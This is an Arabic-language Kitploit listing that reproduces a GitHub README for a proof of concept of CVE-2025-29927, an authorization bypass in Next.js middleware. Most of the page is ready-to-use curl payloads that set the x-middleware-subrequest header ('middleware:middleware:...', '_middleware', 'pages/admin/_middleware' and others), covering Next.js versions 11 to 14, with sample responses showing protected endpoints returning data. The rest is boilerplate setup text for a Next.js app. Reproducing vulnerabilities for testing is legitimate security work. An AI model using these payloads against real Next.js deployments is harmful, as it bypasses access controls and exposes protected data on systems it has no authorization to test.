Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-2995 — إعادة إنتاج CVE-2025-29927 تجاوز التفويض في برمجيات Next.js الوسيطة، مع حمولات استغلال قائمة على curl لإصدارات متعددة. | Kitploit
أدوات/GitHubGitHub/huynguyen12536/cve-2025-2995
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubhuynguyen12536/cve-2025-2995

CVE-2025-2995

إعادة إنتاج CVE-2025-29927 تجاوز التفويض في برمجيات Next.js الوسيطة، مع حمولات استغلال قائمة على curl لإصدارات متعددة.

عرض المستودع
منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-29927 إعادة إنتاج تجاوز التفويض

هذا المستودع هو إعادة إنتاج لثغرة CVE-2025-29927 في حزمة next

كيفية إعادة الإنتاج

  1. اتبع الخطوات أدناه لاستنساخ التطبيق وتشغيله باستخدام Next.js
  2. اختبر أن التفويض يرفض الوصول إلى نقطة النهاية /api/hello
$ curl http://localhost:3000/api/hello

{"error":"Unauthorized"}%
  1. اختبر أن التفويض يعمل عند توفير رمز مميز
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/hello

{"message":"Hello World"}%
  1. الآن يمكن أيضًا تجاوزها إذا قمنا بتداخل middleware 5 مرات داخل الترويسة الخاصة x-middleware-subrequest:
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/hello

{"message":"Hello, World"}

استغلال CVE-2025-29927 لإصدارات Next.js الأقدم

اعتادت إصدارات Next.js 12 و13 استخدام اصطلاح تسمية مختلف لملف الوسيط (_middleware.js)، والذي تم تغييره إلى middleware.js في Next.js 14. يمكن استغلال هذه الثغرة في الإصدارات الأقدم باستخدام ملف _middleware.js.

على سبيل المثال، ستنطبق الحمولات التالية اعتمادًا على إصدار Next.js واصطلاح التوجيه لديك:

  • curl -H "x-middleware-subrequest: middleware" http://localhost:3000/api/hello (لإصدارات Next.js 12.2 مع ملف middleware.js في جذر التطبيق، وليس داخل دليل pages)
    • curl -H "x-middleware-subrequest: src/middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: _middleware" http://localhost:3000/api/hello (لإصدارات Next.js 11 وحتى 12.2)
  • curl -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: pages/admin/_middleware" http://localhost:3000/api/hello

البدء

أولاً، قم بتشغيل خادم التطوير:

npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev

افتح http://localhost:3000 في متصفحك لرؤية النتيجة.

يمكنك البدء في تحرير الصفحة عن طريق تعديل app/page.js. يتم تحديث الصفحة تلقائيًا أثناء تحرير الملف.

يستخدم هذا المشروع next/font لتحسين وتحميل Geist تلقائيًا، وهي عائلة خطوط جديدة لـ Vercel.

لمعرفة المزيد

لمعرفة المزيد عن Next.js، ألق نظرة على الموارد التالية:

  • توثيق Next.js - تعرّف على ميزات Next.js وAPI.
  • تعلّم Next.js - برنامج تعليمي تفاعلي لـ Next.js.

يمكنك الاطلاع على مستودع Next.js على GitHub - ملاحظاتك ومساهماتك مرحب بها!

النشر على Vercel

أسهل طريقة لنشر تطبيق Next.js الخاص بك هي استخدام منصة Vercel من منشئي Next.js.

راجع توثيق نشر Next.js لمزيد من التفاصيل.

تنزيل الأداة